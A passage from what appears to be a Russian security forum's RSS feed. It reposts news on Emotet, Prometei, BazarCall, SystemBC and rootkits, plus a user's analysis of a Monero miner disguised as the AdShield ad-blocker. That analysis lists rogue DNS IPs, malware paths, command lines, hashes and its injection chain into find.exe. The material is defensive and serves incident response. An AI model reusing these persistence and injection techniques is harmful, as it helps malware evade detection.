        <guid isPermaLink="false">1864@/discussions</guid>
        <description><![CDATA[<img src="https://blog.malwarebytes.com/wp-content/uploads/2018/05/shutterstock_248596792-900x506.jpg" alt="shutterstock_248596792-900x506.jpg" /><br /><br />
Банковский троян Emo<b>tet</b> был впервые обнаружен исследователями безопасности в 2014 году. Первоначально Emotet создавался как банковское вредоносное ПО, которое пыталось проникнуть на ваш компьютер и украсть конфиденциальную и личную информацию. В более поздних версиях программного обеспечения были добавлены службы рассылки спама и вредоносных программ, в том числе других банковских троянцев. Emotet использует функции, которые помогают избежать обнаружения программного обеспечения некоторыми продуктами для защиты от вредоносных программ. Emotet использует возможности червя для распространения на другие подключенные компьютеры. Это помогает в распространении вредоносного ПО. Эта функция позволила прийти к выводу, что Emotet является одним из наиболее дорогостоящих и разрушительных вредоносных программ, поражающих государственный и частный секторы, отдельных лиц и организации, а устранение которых обходится в 1 миллион долларов за инцидент.<br /><br /><b>Что такое Emotet?</b> Emotet - это троянец, который в основном распространяется через спам-сообщения (malspam). <b>Заражение может происходить либо через вредоносный сценарий, файлы документов с поддержкой макросов, либо через вредоносную ссылку. </b>Электронные письма Emotet могут содержать знакомый брендинг, который выглядит как подлинное электронное письмо. Emotet может попытаться убедить пользователей щелкнуть вредоносные файлы, используя соблазнительные выражения о «вашем счете», «платежных реквизитах» или, возможно, о предстоящей доставке от известных компаний по доставке. Emotet прошел несколько итераций. Ранние версии поступали в виде вредоносного файла JavaScript. В более поздних версиях использовались документы с поддержкой макросов для извлечения полезной нагрузки вируса с серверов управления и контроля (C&amp;C), запускаемых злоумышленниками. Emotet использует ряд уловок, чтобы предотвратить обнаружение и анализ. Примечательно, что Emotet знает, работает ли он внутри виртуальной машины (ВМ), и будет бездействовать, если обнаружит среду песочницы, которая является инструментом, который исследователи кибербезопасности используют для наблюдения за вредоносными программами в безопасном контролируемом пространстве. Emotet также использует C&amp;C серверы для получения обновлений. Это работает так же, как и обновления операционной системы на вашем ПК, и может происходить плавно и без каких-либо внешних признаков. Это позволяет злоумышленникам устанавливать обновленные версии программного обеспечения, устанавливать дополнительные вредоносные программы, такие как другие банковские трояны, или действовать в качестве свалки для украденной информации, такой как финансовые учетные данные, имена пользователей и пароли, а также адреса электронной почты.<br /><br /><b>Как распространяется Emotet?</b> Основной метод распространения Emotet - вредоносный спам. Emotet просматривает ваш список контактов и отправляет его вашим друзьям, семье, коллегам и клиентам. Поскольку эти электронные письма поступают из вашей взломанной учетной записи электронной почты, электронные письма меньше похожи на спам, а получатели, чувствуя себя в безопасности, более склонны переходить по неправильным URL-адресам и загружать зараженные файлы. Если подключенная сеть присутствует, Emotet распространяется с использованием списка общих паролей, угадывая путь к другим подключенным системам в результате атаки грубой силы. Если пароль для важнейшего сервера отдела кадров - это просто «password», то, скорее всего, Emotet найдет там свой путь. Первоначально исследователи думали, что Emotet также распространяется с использованием уязвимостей EternalBlue / DoublePulsar, которые были ответственны за атаки WannaCry и NotPetya. Теперь мы знаем, что это не так. К такому выводу исследователей привел тот факт, что TrickBot, троянец, часто распространяемый Emotet, использует эксплойт EternalBlue для распространения по заданной сети. Это был TrickBot, а не Emotet, который воспользовался уязвимостями EternalBlue / DoublePulsar.<br /><br /><b>Какова история Emotet?</b> Впервые обнаруженный в 2014 году, Emotet продолжает заражать системы и причинять вред пользователям по сей день, поэтому мы до сих пор говорим об этом, в отличие от других тенденций 2014 года . Первая версия Emotet была разработана для кражи данных банковских счетов путем перехвата интернет-трафика. Вскоре после этого была обнаружена новая версия программного обеспечения. Эта версия, получившая название Emotet version 2, поставлялась с несколькими модулями, включая систему денежных переводов, модуль против спама и банковский модуль, предназначенный для немецких и австрийских банков. К январю 2015 года на сцене появилась новая версия Emotet. Третья версия содержала скрытые модификации, предназначенные для того, чтобы вредоносная программа оставалась незамеченной, и добавляла новые цели для швейцарских банков. Перенесемся в 2018 год - новые версии троянца Emotet включают возможность установки других вредоносных программ на зараженные машины. Это вредоносное ПО может включать в себя другие трояны и программы-вымогатели. По данным Gizmodo, в июле 2019 года атака Emotet в Лейк-Сити, обошлась городу в 460000 долларов. Анализ атаки показал, что Emotet служил только первоначальным вектором заражения. После заражения Emotet загрузил еще один банковский троян, известный как TrickBot и программу-вымогатель Ryuk. В сентябре 2019 года Malwarebytes Labs сообщила о спам-кампании, организованной ботнетами, нацеленной на жертв из Германии, Польши, Италии и Англии, с искусно сформулированными темами, такими как «Уведомление о переводе платежей» и «Просроченный счет». Открытие зараженного документа Microsoft Word запускает макрос, который, в свою очередь, загружает Emotet со взломанных сайтов WordPress.<br /><br />
«Текущие версии троянца Emotet включают возможность установки других вредоносных программ на зараженные машины. Это вредоносное ПО может включать в себя другие банковские трояны или службы доставки вредоносного спама »<br /><br /><b>На кого нацелен Emotet?</b> Каждый является целью Emotet. На сегодняшний день Emotet атакует частных лиц, компании и государственные учреждения в Соединенных Штатах и Европе, похищая банковские логины, финансовые данные и даже биткойн-кошельки. Одна заслуживающая внимания атака Emotet на город Аллентаун, штат Пенсильвания, потребовала прямой помощи от группы реагирования на инциденты Microsoft для очистки и, как сообщается, стоила городу более 1 миллиона долларов для устранения. Теперь, когда Emotet используется для загрузки и доставки других банковских троянцев, список целей потенциально еще шире. Ранние версии Emotet использовались для атак на клиентов банков в Германии. Более поздние версии Emotet были нацелены на организации в Канаде, Великобритании и США.<br /><blockquote>

<div><b>Как я могу защитить себя от Emotet? </b>Вы уже делаете первый шаг к защите себя и своих пользователей от Emotet, узнав, как работает Emotet. Вот несколько шагов, которые вы можете предпринять: Держите компьютер / конечные точки в актуальном состоянии с помощью последних исправлений для Microsoft Windows. TrickBot часто поставляется в качестве полезной нагрузки Emotet, и мы знаем, что TrickBot полагается на уязвимость Windows EternalBlue для выполнения своей работы, поэтому исправляйте эту уязвимость, прежде чем киберпреступники смогут ею воспользоваться. Не загружайте подозрительные вложения и не переходите по сомнительным ссылкам. Emotet не сможет закрепиться в вашей системе или сети, если вы будете избегать этих подозрительных писем. Найдите время, чтобы обучить своих пользователей тому, как определять вредоносный спам. Обучите себя и своих пользователей созданию надежного пароля. Вы можете защитить себя и своих пользователей от Emotet с помощью надежной программы кибербезопасности, которая включает многоуровневую защиту.</div>
</blockquote>
<br /><a href="https://www.malwarebytes.com/emotet/" rel="nofollow">https://www.malwarebytes.com/emotet/</a>]]>
        </description>
    </item>
    <item>
        <title>Ботнет-бэкдоры на серверах Microsoft Exchange, добывают криптовалюту</title>
        <link>https://chklst.ru/discussion/1877/botnet-bekdory-na-serverah-microsoft-exchange-dobyvayut-kriptovalyutu</link>
        <pubDate>Mon, 26 Apr 2021 14:04:37 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1877@/discussions</guid>
        <description><![CDATA[Непропатченные серверы Microsoft Exchange становятся мишенью для ботнета Prometei и добавляются в армию его операторов ботов для майнинга криптовалюты Monero (XMR).<br /><br />
Это модульное вредоносное ПО может заразить как системы Windows, так и Linux, и впервые оно было обнаружено в прошлом году при использовании эксплойта EternalBlue для распространения по скомпрометированным сетям и порабощения уязвимых компьютеров Windows.<br /><br />
Примерно с 2016 г.<br /><br />
Команда Cybereason Nocturnus недавно обнаружила, что ботнет, вероятно, был активен почти полдесятилетия, согласно артефактам Prometei, представленным VirusTotal в мае 2016 года.<br /><br />
Основываясь на новых образцах вредоносных программ, недавно обнаруженных Cybereason во время недавнего реагирования на инциденты, ботнет также был обновлен для использования уязвимостей Exchange Server, исправленных Microsoft в марте.<br /><br />
Основным направлением атак Prometei на серверы Exchange является развертывание полезной нагрузки криптомайнинга, начало зарабатывания денег для своих операторов и распространение на другие устройства в сети с помощью эксплойтов EternalBlue и BlueKeep, собранных учетных данных и модулей распространения SSH или SQL.<br /><br />
«Когда злоумышленники берут под свой контроль зараженные машины, они не только могут добывать биткойны путем кражи вычислительной мощности, но также могут извлекать конфиденциальную информацию», - сказал Ассаф Дахан, старший директор Cybereason и руководитель отдела исследования угроз.<br /><br />
«При желании злоумышленники могут также заразить скомпрометированные конечные точки другими вредоносными программами и сотрудничать с кибергруппами ransomware, чтобы продать доступ к конечным точкам».<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1109292/2021/Prometei-Exchange-attack-flow.jpg" alt="Prometei-Exchange-attack-flow.jpg" /><br /><br />
Ботнет для криптоджекинга с функциями бэкдора<br /><br />
Тем не менее, вредоносная программа была обновлена ​​за счет возможностей бэкдора с поддержкой обширного набора команд.<br /><br />
К ним относятся загрузка и выполнение файлов, поиск файлов в зараженных системах и выполнение программ или команд от имени злоумышленников.<br /><br />
«Последние версии Prometei теперь предоставляют злоумышленникам сложный и скрытый бэкдор, который поддерживает широкий спектр задач, которые делают добычу монет Monero наименьшей проблемой для жертв», - заявила Cybereason Nocturnus Team.<br /><br />
Исследование Cybereason также указывает на то, что операторы бот-сетей имеют финансовую мотивацию и, вероятно, не спонсируются национальным государством.<br /><br />
«Как было отмечено в недавних атаках Prometei, злоумышленники преодолели волну недавно обнаруженных уязвимостей Microsoft Exchange и использовали их для проникновения в целевые сети», - добавила команда Cybereason Nocturnus.<br /><br />
«Эта угроза представляет собой большой риск для организаций, поскольку злоумышленники имеют полный контроль над зараженными машинами и, если они того пожелают, могут украсть информацию, заразить конечные точки другими вредоносными программами или даже сотрудничать с бандами вымогателей, продавая доступ конечные точки ".<br />
Исправлено более 90% уязвимых серверов Exchange.<br /><br />
Недостатки CVE-2021-27065 и CVE-2021-26858, используемые Prometei, также использовались несколькими поддерживаемыми Китаем хакерскими группами и другими хакерскими группами для развертывания веб-оболочек, программ-вымогателей и вредоносных программ для майнинга криптовалют.<br /><br />
Согласно статистике, опубликованной Microsoft в прошлом месяце, примерно 92% всех подключенных к Интернету локальных серверов Exchange, подверженных этим уязвимостям, теперь исправлены и защищены от атак.<br /><br />
Redmond также выпустил инструмент Exchange On-premises Mitigation Tool (EOMT), который позволяет владельцам малого бизнеса быстро устранять ошибки безопасности даже без помощи специальной группы безопасности.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/botnet-backdoors-microsoft-exchange-servers-mines-cryptocurrency/" rel="nofollow">https://www.bleepingcomputer.com/news/security/botnet-backdoors-microsoft-exchange-servers-mines-cryptocurrency/</a>]]>
        </description>
    </item>
    <item>
        <title>BazarCall использует вредоносные центры обработки вызовов для заражения жертв</title>
        <link>https://chklst.ru/discussion/1876/bazarcall-ispolzuet-vredonosnye-centry-obrabotki-vyzovov-dlya-zarazheniya-zhertv</link>
        <pubDate>Thu, 01 Apr 2021 01:57:42 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1876@/discussions</guid>
        <description><![CDATA[В течение последних двух месяцев исследователи безопасности вели онлайн-битву против нового вредоносного ПО <b>BazarCall</b>, которое использует центры обработки вызовов для распространения некоторых из наиболее вредоносных вредоносных программ для Windows.<br /><br />
Новое вредоносное ПО было обнаружено как распространяемое центрами обработки вызовов в конце января и названо BazarCall или BazaCall, поскольку злоумышленники изначально использовали его для установки вредоносного ПО BazarLoader.<br /><br />
Как и многие вредоносные кампании, BazarCall начинается с фишингового электронного письма, но затем переходит к новому методу распространения - использованию телефонных колл-центров для распространения вредоносных документов Excel, которые устанавливают вредоносные программы.<br /><br />
Вместо того, чтобы связывать вложения с электронным письмом, электронные письма BazarCall предлагают пользователям позвонить по номеру телефона, чтобы отменить подписку, прежде чем они будут автоматически списаны. Эти центры обработки вызовов будут затем направлять пользователей на специально созданный веб-сайт для загрузки «формы отмены», устанавливающей вредоносное ПО BazarCall.<br /><br />
От фишинговых писем до колл-центров<br /><br /><b>Все атаки BazarCall начинаются с фишингового электронного письма, нацеленного на корпоративных пользователей, в котором говорится, что бесплатная пробная версия получателя скоро истечет</b>. Однако эти электронные письма не содержат никаких подробностей о предполагаемой подписке.<br /><br />
Эти электронные письма затем предлагают пользователю связаться с указанным номером телефона, если он хочет отменить подписку, прежде чем с него будет взиматься плата от 69,99 до 89,99 долларов за продление, как показано в примере фишингового письма BazarCall ниже.<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazarcaller/bazarcall-spam-example.jpg" alt="bazarcall-spam-example.jpg" /><br /><br />
Большая часть электронных писем были отправлены с указанием вымышленной компании, такие как "Medical reminder service, Inc.", 'iMed Service, Inc.', 'Blue Cart Service, Inc. . 'и' iMers, Inc. '<br /><br /><b>Во всех этих письмах используются похожие темы, такие как «Спасибо за использование бесплатной пробной версии» или «Ваш бесплатный пробный период почти закончился!»</b> Исследователь безопасности ExecuteMalware составил более обширный список тем электронной почты, используемых в этой атаке.<br /><br />
Когда получатель звонит по указанному номеру телефона, он будет переведен на короткое удержание, а затем его встретит живой человек. При запросе дополнительной информации или о том, как отменить подписку, агент центра обработки вызовов запрашивает у жертвы уникальный идентификатор клиента, указанный в электронном письме.<br /><br />
Если указан правильный идентификатор клиента, агент колл-центра направит пользователя на поддельный веб-сайт, который выдает себя за компанию, предоставляющую медицинские услуги. Телефонный агент останется на телефоне с жертвой и направит их на страницу отмены, где им будет предложено ввести свой идентификатор клиента.<br /><br /><b>Когда пользователь вводит свой идентификационный номер клиента, веб-сайт автоматически предлагает браузеру загрузить документ Excel (xls или xlsb). Затем агент центра обработки вызовов поможет жертве открыть файл и нажать кнопку «Включить контент», чтобы активировать вредоносные макросы.</b><br /><br />
В некоторых звонках, злоумышленники просили его отключить антивирус, чтобы предотвратить обнаружение вредоносных документов.<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazarcaller/malicious-excel-document.jpg" alt="malicious-excel-document.jpg" /><br /><br />
Когда макросы Excel включены, вредоносная программа BazarCall загружается и запускается на компьютере жертвы.<br /><br />
Когда кампания BazarCall только началась, она использовалась для распространения вредоносного ПО BazarLoader, но также начала распространять TrickBot, IcedID, Gozi IFSB и другие вредоносные программы.<br /><br />
Эти заражения Windows особенно опасны, поскольку они обеспечивают удаленный доступ к скомпрометированным корпоративным сетям, где злоумышленники распространяются по сети, чтобы украсть данные или развернуть программы-вымогатели.<br /><br />
Злоумышленники используют BazarLoader и Trickbot для развертывания программ-вымогателей Ryuk или Conti, в то время как IcedID использовался в прошлом для развертывания заражений программ-вымогателей Maze и Egregor.<br /><br />
Благодаря усилиям исследователей служба распространения была вынуждена постоянно менять их номера телефонов и хостинговые сайты, поскольку исследователи их отключили.<br /><br />
К сожалению, даже благодаря совместным усилиям сообщества специалистов по кибербезопасности этот метод распространения оказался очень успешным.<br /><br />
Из-за метода распространения образцы вредоносных программ обычно имеют очень низкий уровень обнаружения на VirusTotal, поскольку они не распространяются публично и не обнаруживаются поставщиками антивирусов.<br /><br /><b>Кроме того, судя по электронным письмам, люди попадают на эту аферу, поскольку считают, что это законные подписки, которые необходимо отменить. </b><br /><br /><a href="https://www.bleepingcomputer.com/news/security/bazarcall-malware-uses-malicious-call-centers-to-infect-victims/" rel="nofollow">https://www.bleepingcomputer.com/news/security/bazarcall-malware-uses-malicious-call-centers-to-infect-victims/</a>]]>
        </description>
    </item>
    <item>
        <title>Майнер Monero распространяется через  установку пакетов AdShield/Netshield, OpenDNS</title>
        <link>https://chklst.ru/discussion/1873/mayner-monero-rasprostranyaetsya-cherez-ustanovku-paketov-adshield-netshield-opendns</link>
        <pubDate>Thu, 11 Mar 2021 13:31:26 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1873@/discussions</guid>
        <description><![CDATA[Активность майнера наблюдалась на форумах (<b>Kasperskyclub.ru</b>, <b>Virusinfo.info</b>, <b>Cyberforum.ru</b>) в период с февраля 2021, отзывы о проблеме, судя по поискам в сети, пошли ранее (ноябрь-декабрь 2020г)<br />
По <b><a href="https://securelist.ru/ad-blocker-with-miner-included/100732/" rel="nofollow">отчету Лаборатории Касперского на securelist.ru</a></b>, активное детектирование началось с февраля 2021 года.<br /><br />
1.
<blockquote>

<div>Зловред распространяется под именем adshield[.]pro и выдает себя за Windows-версию мобильного блокировщика рекламы AdShield. После того как пользователь запускает программу, она меняет настройки DNS на устройстве так, что все домены начинают разрешаться через серверы злоумышленников, которые, в свою очередь, не дают пользователям получить доступ к сайтам некоторых антивирусов, например к Malwarebytes.com.</div>
</blockquote>
<br />
185.201.47.42,142.4.214.15\DNS Server list<br /><br />
2.
<blockquote>

<div>После подмены DNS-серверов зловред начинает обновляться и запускает updater.exe с аргументом self-upgrade («C:\Program Files (x86)\AdShield\updater.exe» -self-upgrade). Updater.exe обращается к командному центру и отправляет сведения о зараженной машине и информацию о начале установки.</div>
</blockquote>
<br />
C:\PROGRAM FILES (X86)\ADSHIELD\UPDATER.EXE<br />
HEUR:Trojan.Win32.DNSChanger.gen<br />
C:\WINDOWS\SYSTEM32\TASKS\ADSHIELD SCHEDULED AUTOUPDATE<br />
"C:\Program Files (x86)\AdShield\updater.exe" -self-upgrade<br /><br />
3.
<blockquote>

<div>Updater.exe скачивает с сайта transmissionbt[.]org и запускает модифицированный торрент-клиент Transmission (оригинальный дистрибутив находится по адресу transmissionbt.com). Модифицированная программа отсылает на командный сервер информацию об установке вместе с идентификатором зараженной машины и загружает с него модуль для майнинга.</div>
</blockquote>
<br />
Модули для майнинга состоят из легитимных вспомогательных библиотек, зашифрованного файла с майнером data.pak, исполняемого файла flock.exe\slack.exe\discord.exe и файла «лицензии» lic.data.<br /><blockquote>

<div>....<br />
\Flock\config.json<br />
\Flock\data.pak<br />
\Flock\Flock.exe<br />
\Flock\lic.data<br />
\Flock\Qt5Core.dll<br />
\Flock\WinRing0x64.sys<br />
...<br /></div>
</blockquote>
4. flock.exe запускается с помощью  клиента transmission (запускаемый как служба)<br />
C:\PROGRAM FILES (X86)\TRANSMISSION\TRANSMISSION-DAEMON.EXE<br />
Действительна, подписано SignPath Foundation<br />
"C:\Program Files (x86)\Transmission\transmission-daemon.exe" -run-instance<br /><br />
5. после запуска Flock.exe расшифровывает данные из файла data.pak, содержащие файл майнера.<br />
далее, в копию системного файла find.exe внедряется расшифрованное тело майнера.<br /><br />
(!) Процесс нагружает CPU: C:\WINDOWS\SYSTEM32\FIND.EXE<br />
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3648], tid=3940<br /><blockquote>

<div>Полное имя                  C:\WINDOWS\SYSTEM32\FIND.EXE<br /><br /><br />
pid = 3076                  ***\***<br />
CmdLine                     "C:\ProgramData\Flock\find.exe"<br />
Процесс создан              00:39:49 [2021.02.18]<br />
С момента создания          00:05:25<br />
CPU                         49,85%<br />
CPU (1 core)                797,57%<br />
parentid = 13628<br />
ESTABLISHED                 192.168.0.98:55478 &lt;-&gt; 54.93.84.207:443<br />
Предупреждение              (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=14380<br />
SHA1                        1E44EE63BDB2CF3A6E48B521844204218A001344<br />
MD5                         AE3F3DC3ED900F2A582BAD86A764508C<br /><br />
Загруженные DLL             НЕИЗВЕСТНЫЕ<br />
BXSDK64.DLL                 C:\USERS\SHUM\APPDATA\LOCAL\TEMP<br /><br />
Загруженные DLL             ИЗВЕСТНЫЕ и ПРОВЕРЕННЫЕ<br />
ADVAPI32.DLL                C:\WINDOWS\SYSTEM32</div>
</blockquote>
<br />
далее, разработчиком uVS предложена новая функция (реализована в 4.1.15 и расширена в 4.1.16), которая позволила отследить, каким образом запускается Flock.exe\Slack.exe\Discord.exe<br />
+<br />
спасибо, <b>Sandor-у</b> за оперативно <a href="https://www.cyberforum.ru/post15308023.html" rel="nofollow">добавленный диалог</a>:<br />
+<br /><b>Vvvyg</b> - за скрипт экспорта журналов для анализа<br />
+<br /><b>Virus Monitoring Service Doctor Web Ltd.</b>  за поиск тела майнера в папке модулей flock<br /><br />
благодаря предложенной функции стало возможным отследить цепочку запуска вредоносных программ.<br /><blockquote>

<div>EV_RenderedValue_0,00<br />
Elvi51<br />
ELVI51<br />
277248<br />
7264<br />
C:\Windows\System32\find.exe<br />
%%1937<br />
16620<br />
"C:\WINDOWS\system32\find.exe"<br />
EV_RenderedValue_9,00<br />
-<br />
-<br />
0<br />
C:\ProgramData\Discord\Discord.exe<br />
EV_RenderedValue_14,00</div>
</blockquote>

<blockquote>

<div>К событию были добавлены следующие сведения:<br /><br />
EV_RenderedValue_0,00<br />
ELVI51$<br />
WORKGROUP<br />
999<br />
16620<br />
C:\ProgramData\Discord\Discord.exe<br />
%%1937<br />
1400<br />
C:\ProgramData\Discord\Discord.exe --min<br />
EV_RenderedValue_9,00<br />
Elvi51<br />
ELVI51<br />
277248<br />
C:\Windows\System32\svchost.exe<br />
EV_RenderedValue_14,00</div>
</blockquote>
<br />
из uVS видим что Discord.exe запускается через задачу:
<div>Полное имя                  C:\PROGRAMDATA\DISCORD\DISCORD.EXE<br /><br />
SHA1                        397F3E0FD803DA50EC667C1161E57CDC242400C3<br />
MD5                         07D8343249A56EEBF2B1A8B944C217A3<br /><br />
Ссылки на объект<br />
Ссылка                      C:\WINDOWS\TASKS\DISCORDCHECK_4.JOB<br />
Значение                    "C:\ProgramData\Discord\Discord.exe" --min</div>

<blockquote>

<div>
<hr />
4.11.5
<hr />
o Добавлена поддержка отслеживания процессов.<br />
Отслеживание процессов позволяет определять родителя любого процесса, даже если родительский процесс уже завершен, а также достоверно определять все файлы, которые запускались с момента старта системы.</div>
</blockquote>
<br />
Полное имя                  C:\PROGRAMDATA\SLACK\SLACK.EXE<br />
Тек. статус                 ВИРУС [Запускался неявно или вручную]<br /><br />
Создан                      08.03.2021 в 09:52:29<br />
Изменен                     08.03.2021 в 11:17:11<br /><br />
Доп. информация             на момент обновления списка<br />
pid = 13816                 *****\****<br />
Процесс создан              11:17:35 [2021.03.08]<br />
Процесс завершен            11:18:28 [2021.03.08]<br /><b>parentid = 1684             C:\WINDOWS\SYSTEM32\SVCHOST.EXE</b><br />
SHA1                        9C44709D620DF76174B6E268DADA1256FA3BA007<br />
MD5                         C7988D4AE969D11D9ABBAFC8CE0C5CA2<br /><br />
pid = 1684                  NT AUTHORITY\СИСТЕМА<br />
CmdLine                     C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule<br />
Процесс создан              11:16:52 [2021.03.08]<br />
+
<blockquote>

<div>
<hr />
4.11.6
<hr />
o Добавлена поддержка отслеживания задач.<br />
В окно информации исполняемого файла, который создавал, модифицировал или изменял задачи добавлены следующие разделы:<br /><b> "Создание задачи", "Удаление задачи", "Обновление задачи"</b> в которых указано время операции, pid процесса,<br />
pid и имя запустившего процесс, а так же XML описание задачи при его наличии.<br />
Твики #39/#40 теперь включают/отключают отслеживание процессов и задач.<br />
(!) Только для Windows 10 билд 1903 и выше.</div>
</blockquote>
<br />
подробнее по данному майнеру в отчете на securelist.ru<br /><a href="https://securelist.ru/ad-blocker-with-miner-included/100732/" rel="nofollow">https://securelist.ru/ad-blocker-with-miner-included/100732/</a><br />]]>
        </description>
    </item>
    <item>
        <title>SystemBC: кибергруппы автоматизируют доставку полезной нагрузки с помощью вредоносного ПО</title>
        <link>https://chklst.ru/discussion/1860/systembc-kibergruppy-avtomatiziruyut-dostavku-poleznoy-nagruzki-s-pomoschyu-vredonosnogo-po</link>
        <pubDate>Thu, 17 Dec 2020 14:41:39 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1860@/discussions</guid>
        <description><![CDATA[<b>SystemBC</b>, массовое вредоносное ПО, продаваемое на подпольных торговых площадках, используется операциями «программа-вымогатель как услуга» (RaaS) для сокрытия вредоносного трафика и автоматизации доставки полезной нагрузки программ-вымогателей в сети скомпрометированных жертв.<br /><br />
Вредоносная программа, впервые обнаруженная в 2018 году и использованная в нескольких кампаниях 2019 года в качестве «виртуальной частной сети», позволила кибергруппам вымогателей и их филиалам развернуть постоянный бэкдор в системах целей в виде прокси-сервера Tor SOCKS5.<br /><br />
Это помогло им создать запутанные каналы связи для автоматизированного размещения и доставки полезной нагрузки программ-вымогателей, а также для кражи данных.<br /><br />
Используется и Ryuk и Egregor<br /><br />
Согласно информации, собранной исследователями <b>Sophos</b> при расследовании недавних атак программ-вымогателей Ryuk и Egregor, SystemBC был задействован во всех их атаках в течение последних месяцев.<br /><br />
«Мы все чаще видим, как операторы программ-вымогателей передают на аутсорсинг развертывание программ-вымогателей аффилированным лицам, использующим стандартные вредоносные программы и инструменты атак», - сказал исследователь безопасности Sophos Шон Галлахер в отчете, который был заранее предоставлен BleepingComputer.<br /><br />
«SystemBC является регулярной частью последних наборов инструментов злоумышленников - Sophos обнаружил сотни попыток развертывания SystemBC по всему миру за последние несколько месяцев».<br /><br />
Ryuk развертывает SystemBC на контроллере домена вместе с помощью нескольких штаммов вредоносного ПО, включая Buer Loader, BazarLoader и Zloader, в то время как операторы Egregor предпочли использовать программу для кражи информации Qbot.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1109292/2020/SystemBC%20in%20Ryuk%20attack.jpg" alt="SystemBC%20in%20Ryuk%20attack.jpg" /><br /><br />
Автоматическое развертывание полезной нагрузки<br /><br />
Операторы программ-вымогателей используют этот постоянный бэкдор в качестве инструмента удаленного администрирования (RAT) вместе с инструментом пост-эксплуатации Cobalt Strike на этапе бокового перемещения своих атак после получения доступа к сетям жертв.<br /><br />
SystemBC также используется в качестве специального инструмента сохранения и выполнения для автоматизации различных задач, включая развертывание программ-вымогателей на конечных точках сети после утечки украденных данных.<br /><br />
Злоумышленники также используют его для выполнения команд на зараженных устройствах Windows, отправленных через соединение Tor, а также для доставки вредоносных сценариев, библиотек динамической компоновки (DLL) и сценариев, которые запускаются автоматически, не требуя ручного вмешательства оператора.<br /><br />
Хотя эти возможности автоматизации изначально были разработаны для использования в атаках с массовым использованием, операции RaaS настроили их для массового развертывания в сети единичных жертв.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1109292/2020/SystemBC.jpg" alt="SystemBC.jpg" /><br /><br />
Это позволяет операторам программ-вымогателей управлять атаками, нацеленными на нескольких жертв одновременно, «позволяя автоматизировать развертывание программ-вымогателей с использованием встроенных инструментов Windows, если злоумышленники получают надлежащие учетные данные».<br /><br />
Несмотря на то, что некоторые средства защиты от вредоносных программ Windows обнаруживают и блокируют попытки развертывания SystemBC, банды вымогателей по-прежнему могут размещать их в сетях своих целей, используя законные учетные данные, украденные на начальных этапах их атак, или пользуясь преимуществами менее эффективных антивирусных решений.<br /><br />
«Использование нескольких инструментов в атаках типа« программа-вымогатель как услуга »создает все более разнообразный профиль атаки, который специалистам по ИТ-безопасности труднее предсказать и с которым справиться», - сказал Галлахер.<br /><br />
«Глубокая защита, обучение сотрудников и поиск угроз с привлечением человека необходимы для обнаружения и блокирования таких атак».<br /><br /><a href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-automate-payload-delivery-with-systembc-malware/" rel="nofollow">https://www.bleepingcomputer.com/news/security/ransomware-gangs-automate-payload-delivery-with-systembc-malware/</a><br /><br />]]>
        </description>
    </item>
    <item>
        <title>Как предотвратить атаку руткита</title>
        <link>https://chklst.ru/discussion/1832/kak-predotvratit-ataku-rutkita</link>
        <pubDate>Fri, 17 Jan 2020 12:58:03 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1832@/discussions</guid>
        <description><![CDATA[<img src="https://blog.malwarebytes.com/wp-content/uploads/2020/01/shutterstock_673339993-900x506.jpg" alt="shutterstock_673339993-900x506.jpg" /><br /><br />
Руткит-атаки считаются одной из самых опасных киберугроз сегодня.<br /><br />
Руткиты - это разновидность вредоносных программ, с целью сокрытия присутствия на вашем компьютере. Киберпреступники используют руткиты для удаленного доступа к вашей машине и управления ею, глубоко врезаясь в систему. Руткиты, как правило, заражают компьютеры с помощью фишинговой электронной почты, обманывая пользователей правдоподобной почтой, которая на самом деле содержит вредоносное ПО, но иногда их можно доставить с помощью наборов эксплойтов.<br /><br />
Что такое руткит?<br /><br />
Первоначально руткит представлял собой набор инструментов, обеспечивающих административный доступ к компьютеру или сети. Сегодня руткиты связаны с вредоносным программным обеспечением, которое обеспечивает привилегированный доступ к компьютеру на уровне root, скрывая его существование и действия. Хакеры используют руткиты, чтобы скрыть себя, пока не решат запустить вредоносное вредоносное ПО.<br /><br />
Кроме того, руткиты могут деактивировать антивирусные программы и наносить серьезный ущерб приложениям пользовательского режима. Злоумышленники также могут использовать руткиты для слежки за поведением пользователей, запуска DDoS-атак, повышения привилегий и кражи конфиденциальных данных.<br /><br />
Возможные результаты атаки руткитов<br /><br />
Сегодня авторы вредоносных программ могут легко покупать руткиты в подпольной сети и использовать их в своих атаках. Здесь приведены примеры возможных последствий атаки руткитов.<br /><br />
Конфиденциальные данные украдены<br /><br />
Руткиты позволяют хакерам скрывать дополнительные вредоносные программы, которые крадут конфиденциальную информацию, такую ​​как номера кредитных карт, номера социального страхования и пароли пользователей.<br /><br />
Вредоносное ПО<br /><br />
Злоумышленники используют руткиты для установки вредоносных программ на компьютеры и системы без обнаружения. Руткиты скрывают вредоносное программное обеспечение от любых существующих антивирусных программ или антивирусов, часто деактивируя программное обеспечение безопасности без ведома пользователя. В результате деактивированного антивирусного и антивирусного программного обеспечения руткиты позволяют злоумышленникам запускать вредоносные файлы на зараженных компьютерах.<br /><br />
Удаление файла<br /><br />
Руткиты предоставляют доступ ко всем файлам и командам операционной системы. Злоумышленники, использующие руткиты, могут легко удалить каталоги, ключи и файлы Linux или Windows.<br /><br />
подслушивание<br /><br />
